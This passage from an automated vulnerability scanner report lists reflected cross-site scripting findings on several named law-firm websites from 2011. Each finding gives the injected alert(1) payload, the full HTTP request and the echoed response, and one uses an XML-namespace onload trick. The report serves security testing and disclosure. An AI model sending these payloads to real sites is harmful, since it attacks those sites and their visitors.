X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=xxbjjcegd5hxmw55jxay4l3b; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 63749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<350)
{
   location.href='showoffice.aspx?Show=542&5a79d'-alert(1)-'f0c22b0c26f=1&mobile=True'
}

</script>
...[SNIP]...

2.37. http://www.fulbright.com/index.cfm [eTitle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the eTitle request parameter is copied into the HTML document as plain text between tags. The payload 8d254<script>alert(1)</script>39610b88ceb was submitted in the eTitle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E8d254<script>alert(1)</script>39610b88ceb HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D395%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:17 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="">Washington, D.C.8d254<script>alert(1)</script>39610b88ceb</a>
...[SNIP]...

2.38. http://www.fulbright.com/index.cfm [eTitle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the eTitle request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94895"><script>alert(1)</script>288abb3048 was submitted in the eTitle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E94895"><script>alert(1)</script>288abb3048 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A16%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D369%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:16 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="/index.cfm?ETITLE=Washington, D.C.94895"><script>alert(1)</script>288abb3048&FUSEACTION=correspondence.emailform&SITE_ID=299&pf=y">
...[SNIP]...

2.39. http://www.fulbright.com/index.cfm [fuseaction parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the HTML document as plain text between tags. The payload 6f457<script>alert(1)</script>e9f570c8d27 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=news.site6f457<script>alert(1)</script>e9f570c8d27&site_id=299 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A02%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D218%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:02 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
</h2>
                                   
           I received a fuseaction called "news.site6f457<script>alert(1)</script>e9f570c8d27" I don't know what to do with!<br>
...[SNIP]...

2.40. http://www.fulbright.com/index.cfm [fuseaction parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 145fe"><script>alert(1)</script>aed5c335ef1 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=news.site145fe"><script>alert(1)</script>aed5c335ef1&site_id=299 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A00%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D210%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:00 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="/index.cfm?FUSEACTION=news.site145fe"><script>alert(1)</script>aed5c335ef1&SITE_ID=299&pf=y">
...[SNIP]...

2.41. http://www.fulbright.com/index.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed44"><script>alert(1)</script>c707a822c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=news.site&site_id=299&fed44"><script>alert(1)</script>c707a822c6a=1 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A39%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D575%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="/index.cfm?FED44"><SCRIPT>ALERT(1)</SCRIPT>C707A822C6A=1&FUSEACTION=news.site&SITE_ID=299&pf=y">
...[SNIP]...

2.42. http://www.fulbright.com/index.cfm [pf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the pf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 660d3"><script>alert(1)</script>39aa8a72e69 was submitted in the pf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?FUSEACTION=home.299&pf=y660d3"><script>alert(1)</script>39aa8a72e69 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D161%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="/index.cfm?FUSEACTION=home.299&PF=y660d3"><script>alert(1)</script>39aa8a72e69&pf=y">
...[SNIP]...

2.43. http://www.fulbright.com/index.cfm [rss parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the rss request parameter is copied into the value of an XML tag attribute which is encapsulated in double quotation marks. The payload 1c76a"><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>2edafab2731 was submitted in the rss parameter. This input was echoed as 1c76a"><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>2edafab2731 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /index.cfm?fuseaction=news.allrss&site_id=286&rss=y1c76a"><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>2edafab2731 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A44%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D626%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:44 GMT;path=/
Content-Type: text/xml

<html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


        -
       


...[SNIP]...
<a href="/index.cfm?FUSEACTION=news.allrss&RSS=y1c76a"><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>2edafab2731&SITE_ID=286&pf=y">
...[SNIP]...

2.44. http://www.jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jonesdaydiversity.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d512'-alert(1)-'f727d73fb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?2d512'-alert(1)-'f727d73fb9=1 HTTP/1.1
Host: www.jonesdaydiversity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:51:57 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000610
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A37
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=6605501; path=/
Set-Cookie: SiteId=1383; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=kqd4kregj1lis3uz4nrgoa55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9989
Set-Cookie: NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63f45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title id="ctl00_htmlTitle">Jones Day Diversity</title>
<link rel="stylesheet"
...[SNIP]...
<![CDATA[
var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/Home.aspx?2d512'-alert(1)-'f727d73fb9=1';//]]>
...[SNIP]...

2.45. http://www.mckennacuneo.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mckennacuneo.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5b15f'><script>alert(1)</script>1d12d371487 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5b15f'><script>alert(1)</script>1d12d371487=1 HTTP/1.1
Host: www.mckennacuneo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 16:52:37 GMT
Server: Apache/2.2.15 (FreeBSD)
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15847

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.1//EN' 'http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml'>
<head>
<meta http-equiv='Content-Type' content='text/html;
...[SNIP]...
<a id='emailThisPage' href='/?5b15f'><script>alert(1)</script>1d12d371487=1&email-this-page' rel='nofollow'>
...[SNIP]...

2.46. http://www.skadden.com/2011insights.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /2011insights.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86470"-alert(1)-"c4c00aee9af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011insights.cfm?86470"-alert(1)-"c4c00aee9af=1 HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BACKLINK=%2C86470%22%2Dalert%281%29%2D%22c4c00aee9af%3D1;expires=Fri, 11-Jan-2041 15:14:49 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E
...[SNIP]...
<script type="text/javascript">
extra = "height="+screen.height+",width="+screen.width+",location=no";
function printWindow(){
window.open("http://www.skadden.com/PrintToPDF.cfm?print=1&86470"-alert(1)-"c4c00aee9af=1","PDF",extra)
}

function pdfWindow(url){
window.open(url,"PDF",extra);
}
</script>
...[SNIP]...

2.47. http://www.skadden.com/index.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90bb3"-alert(1)-"0eb36443031 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.cfm?contentID=42&itemID=1478&90bb3"-alert(1)-"0eb36443031=1 HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478%2690bb3%22%2Dalert%281%29%2D%220eb36443031%3D1;expires=Fri, 11-Jan-2041 15:14:54 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                               <!DOCTYPE html PUB
...[SNIP]...
"text/javascript">
extra = "height="+screen.height+",width="+screen.width+",location=no";
function printWindow(){
window.open("http://www.skadden.com/PrintToPDF.cfm?print=1&contentID=42&itemID=1478&90bb3"-alert(1)-"0eb36443031=1","PDF",extra)
}

function pdfWindow(url){
window.open(url,"PDF",extra);
}
</script>
...[SNIP]...

2.48. http://www.weil.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weil.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef2ab</script><script>alert(1)</script>803ebce93f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?ef2ab</script><script>alert(1)</script>803ebce93f8=1 HTTP/1.1
Host: www.weil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:53 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 001148
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A02
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1087; path=/
Set-Cookie: PortletId=1701; path=/
Set-Cookie: SiteId=1086; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=h3zixcnxcv5l1a45xxonrz45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1085&RootPortletID=665&RootPortletH4AssetID=1301&LicenseKey= &Name=Web Framework&URL=wc; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19529
Set-Cookie: NSC_MC_XfjmQpe_B0102=ffffffff09d5f61c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<title id="ctl00_htmlTitle">Weil, Gotshal &amp; Man
...[SNIP]...
<!--
window["ctl00_ctl04_cmbSearch"] = new RadComboBox("cmbSearch","ctl00_ctl04_cmbSearch");window["ctl00_ctl04_cmbSearch"].Initialize({"LoadOnDemandUrl":"/sitesearchstream.aspx?ef2ab</script><script>alert(1)</script>803ebce93f8=1&rcbID=ctl00_ctl04_cmbSearch&rcbServerID=cmbSearch","OnClientSelectedIndexChanged":"SelectedIndexChanged","OnClientDropDownOpening":"HandleOpen","OnClientFocus":"GotFocus","OnClientBlur":"GotBlur","O
...[SNIP]...

2.49. http://www.weil.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weil.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd131'-alert(1)-'83a7499dccf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cd131'-alert(1)-'83a7499dccf=1 HTTP/1.1
Host: www.weil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:55 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 001148
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A02
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1087; path=/
Set-Cookie: PortletId=1701; path=/
Set-Cookie: SiteId=1086; path=/
Set-Cookie: SERVER_PORT=80; path=/
